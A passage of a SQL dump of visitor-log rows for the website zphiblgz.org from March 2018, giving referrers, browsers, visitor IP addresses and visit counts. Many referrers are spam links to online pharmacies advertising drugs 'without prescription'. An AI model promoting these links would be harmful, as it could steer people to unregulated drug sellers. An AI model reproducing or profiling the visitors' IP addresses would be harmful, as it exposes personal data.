','https://buy-meds24.com/','MSIE','Windows','6.0','','46.118.116.121','000',2,0),(25909,'2018-03-04','https://zphiblgz.org','Firefox','Windows','40.1','','185.136.116.106','000',2,0),(25910,'2018-03-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(25911,'2018-03-04','http://antonovich-design.com.ua/','Opera','Windows','8.00','','134.249.48.151','000',1,0),(25912,'2018-03-04','http://x-lime.net/','MSIE','Windows','3.02','','46.118.116.121','000',2,0),(25913,'2018-03-04','https://zphiblgz.org','Firefox','Windows','40.1','','160.179.6.8','000',2,0),(25914,'2018-03-04','https://www.google.com/','Safari','iPhone','11.0','','129.219.8.1','000',2,0),(25915,'2018-03-04','https://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','129.219.8.139','000',3,0),(25916,'2018-03-04','https://zelena-mriya.com.ua/','MSIE','Windows','6.0','','46.119.114.157','000',5,0),(25917,'2018-03-04','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','96.255.95.22','000',7,0),(25918,'2018-03-04','https://zphiblgz.org','Safari','Macintosh','10.1.2','','96.255.95.22','000',4,0),(25919,'2018-03-04','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.201.151.83','000',3,0),(25920,'2018-03-04','https://zphiblgz.org','Firefox','Windows','40.1','','105.103.13.65','000',2,0),(25921,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.51','000',2,0),(25922,'2018-03-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.187.94.86','000',1,0),(25923,'2018-03-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(25924,'2018-03-04','http://site.ru','Chrome','Windows','5.0.375.99','','91.98.103.46','000',2,0),(25925,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.41','000',1,0),(25926,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.163','000',3,0),(25927,'2018-03-04','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(25928,'2018-03-04','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(25929,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.63.43','000',1,0),(25930,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.147.32','000',1,0),(25931,'2018-03-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(25932,'2018-03-04','http://site.ru','Chrome','Windows','5.0.375.99','','78.110.50.150','000',4,0),(25933,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.163','000',2,0),(25934,'2018-03-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.107.81.233','000',1,0),(25935,'2018-03-04','https://zphiblgz.org','Firefox','Windows','40.1','','196.206.89.253','000',2,0),(25936,'2018-03-04','https://zphiblgz.org','python-requests','Unknown','1.2.3','','52.57.154.39','000',5,0),(25937,'2018-03-04','https://zphiblgz.org','Chrome','Macintosh','64.0.3282.167','','100.36.84.244','000',2,0),(25938,'2018-03-04','https://professionalsolutions.eu/ru/','Opera','Windows','6.01','','134.249.48.151','000',3,0),(25939,'2018-03-04','https://zphiblgz.org','Edge','Windows','16.16299','','71.179.132.20','000',2,0),(25940,'2018-03-04','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(25941,'2018-03-04','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(25942,'2018-03-04','http://zphiblgz.org','Firefox','Windows','50.0','','195.22.125.80','000',2,0),(25943,'2018-03-04','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1715.Mwt7LyhgeCpUinMy4K4TuXF6Tik4xD1GwJ61XniXXIqb0UjieebiUXPRDTPaSM18.bd7b1041533110a1e6d8ba82fc4bd73d2021a44a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlmNkdLRVlvQkZZY0NUa3FpMkdyYlA3YUhoTlllZWZ0VlN5YXE2bDdBRjJIWGxsSTU2NDRHRXBqRVVNTTNNR21EeU4wb2NVXzcyLWZscnp2T1FrdnRSNA&b64e=2&sign=96143661a86563f52fe4ac601b6e0f8f&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiMvTDJbqan0mzMhmFIONQcIJktmvqMTLtm-Fqi2LmJBtm3eTXR9BZK2yA-uWVG5jPphIox_WO0ECDztjisUqTk8AdDOuuB0z1Awlh1aPa1Q2nNH972c9xGDI8zwOzK2pK&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXma_RTIh0ntIXzz-TYjOjSxauRAWJk9sSi-h0GsU4uqFbg0kjlksXlZ2mQwPJ44sa1U6thA1y0Xg&l10n=ru&cts=1520210268492&mc=3.23485133404','Chrome','Windows','62.0.3202.94','','5.166.150.242','000',2,0),(25944,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',2,0),(25945,'2018-03-04','http://zphiblgz.org/','Firefox','Windows','7.0.1','','173.249.18.113','000',1,0),(25946,'2018-03-04','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(25947,'2018-03-04','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(25948,'2018-03-04','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.30','000',1,0),(25949,'2018-03-04','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(25950,'2018-03-04','https://sovetskie-plakaty.ru/','Opera','Windows','8.01','','178.159.37.55','000',3,0),(25951,'2018-03-04','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.31','000',1,0),(25952,'2018-03-04','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','104.168.146.167','000',1,0),(25953,'2018-03-04','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',3,0),(25954,'2018-03-04','https://www.google.com/','Chrome','Windows','64.0.3282.186','','73.129.22.251','000',2,0),(25955,'2018-03-04','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.54.22','000',1,0),(25956,'2018-03-04','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.86','000',2,0),(25957,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.87.206','000',1,0),(25958,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.228','000',1,0),(25959,'2018-03-04','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','46.229.170.197','000',1,0),(25960,'2018-03-04','https://zphiblgz.org','Firefox','Windows','7.0.1','','84.53.225.118','000',1,0),(25961,'2018-03-05','https://zphiblgz.org','MSIE','Windows','11.0','','172.82.185.210','000',1,0),(25962,'2018-03-05','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.167','','71.121.250.43','000',1,0),(25963,'2018-03-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.33','000',2,0),(25964,'2018-03-05','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.30','000',1,0),(25965,'2018-03-05','https://zphiblgz.org','Firefox','Windows','40.1','','109.175.100.159','000',2,0),(25966,'2018-03-05','https://zphiblgz.org/','Firefox','Linux','57.0','','177.35.233.49','000',2,0),(25967,'2018-03-05','https://avtorskoe-vino.ru/','MSIE','Windows','6.0','','46.118.116.121','000',2,0),(25968,'2018-03-05','https://zphiblgz.org','Firefox','Windows','40.1','','116.33.95.43','000',2,0),(25969,'2018-03-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','50.225.39.88','000',2,0),(25970,'2018-03-05','http://site.ru','Chrome','Windows','5.0.375.99','','205.186.176.21','000',1,0),(25971,'2018-03-05','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1717.0msc6W3lTiO-JFAodmDYqYJ9qfxXgxIfU9UdY-pCmOBmtZGg62lm5XNHSZX9Bn5h.6f3763e42a73cf61ea6a8f2c5d7b6439b23180a1&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZkk2ODVsc2xNbDUtZlllSkZYYlp6X1k1TlBWNEpSdHFpbVFIQS0xNEtWVjk3czU0WGVsR0tDSQ&b64e=2&sign=aa4517a6980f1aa12cc95d27cc2e5ee8&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv464mj9ju7YoaXD5dnzZABAs4zpyOP-4KtxjLR4erPMcUMEzohj5oMDr3QMm5JZgEbF3tdaOaoBwhuJnkXnVOCmip_rqReufuWgsOztWzFxBQl48yBr3Cz6KrscymdlppJ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVfOy_uqhbqo_r9k0lfJnkw5dK28pIfsdABI0mNvImy_o2VbSNarSTw-foqaBiudcsT0fw1PFIseQ&l10n=ru&cts=1520266722949&mc=1.96253624256','MSIE','Windows','10.0','','176.14.185.121','000',1,0),(25972,'2018-03-05','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.84','000',1,0),(25973,'2018-03-05','http://site.ru','Chrome','Windows','5.0.375.99','','64.71.32.27','000',1,0),(25974,'2018-03-05','zphiblgz.org','Chrome','Windows','50.0.2661.75','','188.213.175.168','000',1,0),(25975,'2018-03-05','http://profnastil-moscow.ru/','MSIE','Windows','5.5','','46.118.125.21','000',2,0),(25976,'2018-03-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.135.211.92','000',10,0),(25977,'2018-03-05','http://site.ru','Chrome','Windows','5.0.375.99','','159.224.140.223','000',2,0),(25978,'2018-03-05','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','77.120.125.23','000',2,0),(25979,'2018-03-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(25980,'2018-03-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','209.190.209.51','000',5,0),(25981,'2018-03-05','https://pills24h.com/buy-clonidine-online-without-prescription/','MSIE','Windows','6.0','','46.118.125.21','000',5,0),(25982,'2018-03-05','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','192.126.160.138','000',1,0),(25983,'2018-03-05','https://zphiblgz.org','Opera','Windows','8.50','','192.126.160.138','000',1,0),(25984,'2018-03-05','http://stat.lviv.ua/','MSIE','Unknown','6.0','','178.159.37.55','000',2,0),(25985,'2018-03-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.14','000',1,0),(25986,'2018-03-05','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.150.229','000',2,0),(25987,'2018-03-05','http://elementspluss.ru/','MSIE','Windows','6.0','','46.119.114.157','000',3,0),(25988,'2018-03-05','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(25989,'2018-03-05','https://zphiblgz.org','Safari','Windows','4.1','','13.127.24.37','000',1,0),(25990,'2018-03-05','http://search.yahoo.co.jp/','Chrome','Windows','64.0.3282.186','','124.110.153.172','000',1,0),(25991,'2018-03-05','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.172','000',1,0),(25992,'2018-03-05','https://zphiblgz.org','Chrome','Linux','51.0.2731.44','','37.115.191.86','000',2,0),(25993,'2018-03-05','https://zphiblgz.org','Chrome','Windows','64.0.3282.186','','73.173.254.31','000',6,0),(25994,'2018-03-05','http://site.ru','Chrome','Windows','5.0.375.99','','51.254.204.117','000',2,0),(25995,'2018-03-05','https://zphiblgz.org/scholarship/','Chrome','Macintosh','64.0.3282.186','','71.121.250.43','000',2,0),(25996,'2018-03-05','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.148.51','000',1,0),(25997,'2018-03-05','https://td-l-market.ru/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(25998,'2018-03-05','https://zphiblgz.org','Firefox','Windows','40.1','','103.236.176.58','000',2,0),(25999,'2018-03-05','https://zphiblgz.org','Safari','Macintosh','11.0.3','','100.16.228.140','000',2,0),(26000,'2018-03-05','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(26001,'2018-03-05','https://zphiblgz.org','Safari','iPad','8.0','','73.213.25.158','000',18,0),(26002,'2018-03-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(26003,'2018-03-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(26004,'2018-03-05','https://zphiblgz.org/','Firefox','Windows','53.0','','77.120.125.23','000',2,0),(26005,'2018-03-05','https://www.bing.com/','Edge','Windows','16.16299','','68.134.5.21','000',4,0),(26006,'2018-03-05','http://deart-13.ru/','Unknown','Unknown','Unknown','','37.115.112.228','000',3,0),(26007,'2018-03-05','https://zphiblgz.org','AppleWebKit','Windows','534','','65.55.210.108','000',1,0),(26008,'2018-03-05','https://zphiblgz.org','python-requests','Unknown','1.2.3','','18.197.160.150','000',5,0),(26009,'2018-03-05','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(26010,'2018-03-05','http://site.ru','Chrome','Windows','5.0.375.99','','46.4.55.210','000',2,0),(26011,'2018-03-06','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',1,0),(26012,'2018-03-06','https://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','62.122.92.215','000',2,0),(26013,'2018-03-06','https://www.ecosia.org/','Chrome','Windows','64.0.3282.186','','72.215.185.243','000',2,0),(26014,'2018-03-06','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',2,0),(26015,'2018-03-06','https://zphiblgz.org/','Firefox','Windows','53.0','','62.122.92.215','000',2,0),(26016,'2018-03-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26017,'2018-03-06','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','104.131.96.149','000',19,0),(26018,'2018-03-06','https://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','62.122.92.215','000',2,0),(26019,'2018-03-06','https://zphiblgz.org','Firefox','Windows','40.1','','157.48.102.161','000',2,0),(26020,'2018-03-06','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.29','000',1,0),(26021,'2018-03-06','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(26022,'2018-03-06','http://site.ru','Chrome','Windows','5.0.375.99','','185.22.92.226','000',1,0),(26023,'2018-03-06','https://zphiblgz.org','Chrome','Macintosh','54.0.2865.65','','37.115.191.86','000',1,0),(26024,'2018-03-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.31','000',1,0),(26025,'2018-03-06','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(26026,'2018-03-06','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(26027,'2018-03-06','http://sildenafil-tadalafil.info/','Opera','Windows','8.00','','46.119.114.157','000',2,0),(26028,'2018-03-06','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(26029,'2018-03-06','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.167','000',1,0),(26030,'2018-03-06','http://uralsk.xkaz.org/','Unknown','Unknown','Unknown','','134.249.48.151','000',3,0),(26031,'2018-03-06','https://zphiblgz.org','Firefox','Windows','40.0','','95.169.190.237','000',1,0),(26032,'2018-03-06','https://zphiblgz.org','Firefox','Windows','45.0','','50.225.39.73','000',7,0),(26033,'2018-03-06','https://zphiblgz.org','Firefox','Windows','54.0','','50.225.39.81','000',20,0),(26034,'2018-03-06','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','105.105.105.55','000',1,0),(26035,'2018-03-06','http://metallo-konstruktsii.ru/','Opera','Windows','8.00','','178.159.37.55','000',3,0),(26036,'2018-03-06','https://zphiblgz.org','Edge','Windows','12.10240','','50.225.39.74','000',7,0),(26037,'2018-03-06','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.79','000',2,0),(26038,'2018-03-06','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.206','000',1,0),(26039,'2018-03-06','http://zphiblgz.org/','Chrome','Windows','33.0.1750.146','','195.22.127.67','000',3,0),(26040,'2018-03-06','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.167','','50.225.39.75','000',4,0),(26041,'2018-03-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','50.225.39.81','000',3,0),(26042,'2018-03-06','https://buy-meds24.com/','MSIE','Windows','6.0','','178.137.18.222','000',1,0),(26043,'2018-03-06','https://zphiblgz.org','Safari','iPhone','9.0','','123.160.232.10','000',1,0),(26044,'2018-03-06','https://zphiblgz.org','Safari','iPhone','9.0','','123.191.144.254','000',1,0),(26045,'2018-03-06','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(26046,'2018-03-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.172.162','000',2,0),(26047,'2018-03-06','https://mtsguru.ru/','Opera','Windows','7.11','','134.249.48.151','000',1,0),(26048,'2018-03-06','http://kinoduh.ru/','Opera','Windows','8.00','','178.137.18.222','000',1,0),(26049,'2018-03-06','https://zphiblgz.org','Java','Unknown','1.6.0','','178.175.143.186','000',1,0),(26050,'2018-03-06','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','99.203.81.119','000',2,0),(26051,'2018-03-06','https://www.bing.com/','MSIE','Windows','11.0','','139.137.128.60','000',4,0),(26052,'2018-03-06','https://www.google.com/','Chrome','Windows','64.0.3282.186','','69.140.78.114','000',2,0),(26053,'2018-03-06','https://zphiblgz.org/','Chrome','Windows','63.0.3239.108','','71.54.234.209','000',2,0),(26054,'2018-03-06','https://zphiblgz.org','Firefox','Windows','52.0','','192.198.80.227','000',1,0),(26055,'2018-03-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(26056,'2018-03-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(26057,'2018-03-06','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.30','000',1,0),(26058,'2018-03-06','https://zphiblgz.org','Firefox','Windows','40.1','','187.44.92.108','000',2,0),(26059,'2018-03-06','https://zphiblgz.org','Firefox','Windows','52.0','','8.44.100.11','000',2,0),(26060,'2018-03-06','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(26061,'2018-03-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.174.48','000',2,0),(26062,'2018-03-06','https://zphiblgz.org/scholarship/application/','Chrome','Macintosh','64.0.3282.167','','71.179.18.125','000',3,0),(26063,'2018-03-06','http://www.zphibmaryland.org/chapters/','Chrome','Windows','64.0.3282.186','','69.195.247.116','000',3,0),(26064,'2018-03-06','https://laminat.com.ua/','MSIE','Unknown','6.0','','134.249.48.151','000',1,0),(26065,'2018-03-06','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','98.233.148.198','000',1,0),(26066,'2018-03-06','https://www.google.com/','Chrome','Windows','65.0.3325.146','','98.117.57.183','000',11,0),(26067,'2018-03-06','https://www.google.com/','Safari','iPhone','11.0','','99.203.16.234','000',2,0),(26068,'2018-03-06','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1718.8QFns0migp_Rwn11BKl9kJZrnJzwuLaFLMuZeqI0pySEOPcu3B-hW5DwBdMXe0R4.b2abfe6b63213458e58b2afbf1a95045f5a6d908&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4N19MUldTcDhsVzlyd0wtUlZHWjNmSVlObjdDU0JrT1Q1UVdidnJWZkRTbGNoMUJKSjQyNmtfeGEyWGh3TzVUekFPUEU3MDZCR2d2Znl5VU1vZjN1M2QwMk9scHBxYk1HU0pqZl9KWGZHemlDczctRDNmUmhtU2hWbEcyUGI2ZzA&b64e=2&sign=ec5d2391ad31872f69d8ade6fbb0dd38&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4h_nhCVG2qwLcdsQor4t_K5kDuS_7CXUrzEYtMZ67guP7JNLrHavx6lumTgcdkJk7DUBdnVUCVwEQu1BYjYxS1ttR598euPlxcCzlFo9p6NMvKIOsTS27Rf7d2dQoPJLB&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVDu_0gFYcyWSN9F9trXsWST3nG8nChkO7kLb7fk_NYM8J82uIqRSNB_hbl_TxDztF62jYdqyGG7A&l10n=ru&cts=1520383213567&mc=5.60875729842','MSIE','Windows','10.0','','95.84.167.138','000',1,0),(26069,'2018-03-06','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(26070,'2018-03-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','163.44.167.187','000',2,0),(26071,'2018-03-06','https://zphiblgz.org','Firefox','Macintosh','37.0','','107.175.72.127','000',2,0),(26072,'2018-03-06','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(26073,'2018-03-06','https://zphiblgz.org','Safari','Macintosh','11.0.1','','52.165.148.51','000',1,0),(26074,'2018-03-06','https://sovetskie-plakaty.ru/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(26075,'2018-03-06','https://kerch.site/','Unknown','Unknown','Unknown','','178.137.16.174','000',2,0),(26076,'2018-03-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(26077,'2018-03-06','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(26078,'2018-03-06','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(26079,'2018-03-07','https://zphiblgz.org','Firefox','Windows','52.0','','192.198.80.227','000',1,0),(26080,'2018-03-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(26081,'2018-03-07','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(26082,'2018-03-07','https://zphiblgz.org','Firefox','Windows','40.1','','122.171.154.20','000',2,0),(26083,'2018-03-07','https://buynorxx.com/','MSIE','Windows','6.0','','178.137.16.174','000',3,0),(26084,'2018-03-07','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',3,0),(26085,'2018-03-07','https://vzube.com/','Opera','Windows','9.0','','134.249.48.151','000',2,0),(26086,'2018-03-07','https://zphiblgz.org','Firefox','Windows','32.0','','51.254.147.50','000',2,0),(26087,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.176.170','000',2,0),(26088,'2018-03-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.14','000',1,0),(26089,'2018-03-07','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.25.213','000',1,0),(26090,'2018-03-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.178.249','000',2,0),(26091,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.3','000',2,0),(26092,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.222.46','000',1,0),(26093,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.157','000',2,0),(26094,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.216','000',2,0),(26095,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.214.197','000',2,0),(26096,'2018-03-07','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.220.4','000',2,0),(26097,'2018-03-07','https://zphiblgz.org','Firefox','Windows','40.1','','89.42.16.47','000',2,0),(26098,'2018-03-07','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','148.251.237.246','000',1,0),(26099,'2018-03-07','http://rql.kiev.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26100,'2018-03-07','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','192.198.80.227','000',2,0),(26101,'2018-03-07','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.64.115.6','000',3,0),(26102,'2018-03-07','https://zphiblgz.org/','Firefox','Windows','50.0','','31.130.21.164','000',2,0),(26103,'2018-03-07','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.153.11','000',2,0),(26104,'2018-03-07','http://www.columb.net.ua/','Unknown','Unknown','Unknown','','178.137.18.222','000',2,0),(26105,'2018-03-07','https://vsdelke.ru/','MSIE','Windows','6.0','','46.119.126.51','000',5,0),(26106,'2018-03-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',33,0),(26107,'2018-03-07','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.31','000',1,0),(26108,'2018-03-07','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(26109,'2018-03-07','http://zphiblgz.org/','MSIE','Windows','11.0','','64.145.94.168','000',1,0),(26110,'2018-03-07','https://www.google.com/','Chrome','Windows','64.0.3282.186','','74.103.159.16','000',1,0),(26111,'2018-03-07','https://r.search.yahoo.com/_ylt=AwrE19gDVaBarvUAndNXNyoA;_ylu=X3oDMTEyamptaGM0BGNvbG8DYmYxBHBvcwM0BHZ0aWQDQjUxNTBfMQRzZWMDc3I-/RV=2/RE=1520485763/RO=10/RU=https%3a%2f%2fzphiblgz.org%2fscholarship%2fapplication%2f/RK=2/RS=0eznL5ZEC1.AQWrAUVf71aYVlck-','MSIE','Windows','9.0','','204.69.115.201','000',2,0),(26112,'2018-03-07','https://www.google.com/','Safari','iPhone','11.0','','70.184.113.36','000',2,0),(26113,'2018-03-07','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.30','000',1,0),(26114,'2018-03-07','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.30','000',1,0),(26115,'2018-03-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','78.109.23.1','000',1,0),(26116,'2018-03-07','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(26117,'2018-03-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(26118,'2018-03-07','https://zphiblgz.org','MSIE','Windows','10.0','','18.197.84.57','000',1,0),(26119,'2018-03-07','https://www.google.com/','Chrome','Windows','64.0.3282.186','','73.129.22.251','000',2,0),(26120,'2018-03-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(26121,'2018-03-07','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.30','000',1,0),(26122,'2018-03-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(26123,'2018-03-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.31','000',1,0),(26124,'2018-03-07','https://pills24h.com/buy-zoloft-online-without-prescription/','MSIE','Windows','5.5','','46.119.126.51','000',2,0),(26125,'2018-03-07','https://zphiblgz.org','Chrome','Chrome OS','59.0.3071.134','','96.234.182.174','000',8,0),(26126,'2018-03-07','zphiblgz.org','Chrome','Windows','46.0.2754.75','','75.99.13.124','000',1,0),(26127,'2018-03-07','https://zphiblgz.org','Firefox','Windows','40.1','','76.116.141.170','000',2,0),(26128,'2018-03-07','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1719.5WjIg6iLC_lT5M4RiuAIQbbkBP2gLEFLwFR5lD183FpwweHlNZ9i4rqdmGpVgVhq.46de1fc668086e8359557eed93eb347d846539a8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4U252TFdDRjJQZkRGMHA3T05VVHp2Wm9yUkRZSjd4b1BXcFUyUjZ5dEdkTzZCTDQ0czJLU2x0ZjBTa3daUC1XOA&b64e=2&sign=f32310a9547daff5ff1b6deffa073e81&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUf4BKcJRvzrhP54BKoPyKURY8KnsuQNJ5PJ4g632aRldKdHNLOUTPvQi6hvtaOOL-z2bglcxdYXlk_vEtGIZ-9Uh4VMkCjI_t7myJ48BBERtDPhL-jfB_j5QDGUjGA5Oli&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUeNiDU-Ul0A8fWP6cseljkMIA2-oQLa-dnRo2pUOlVz3gpf7L9Jtl5gyI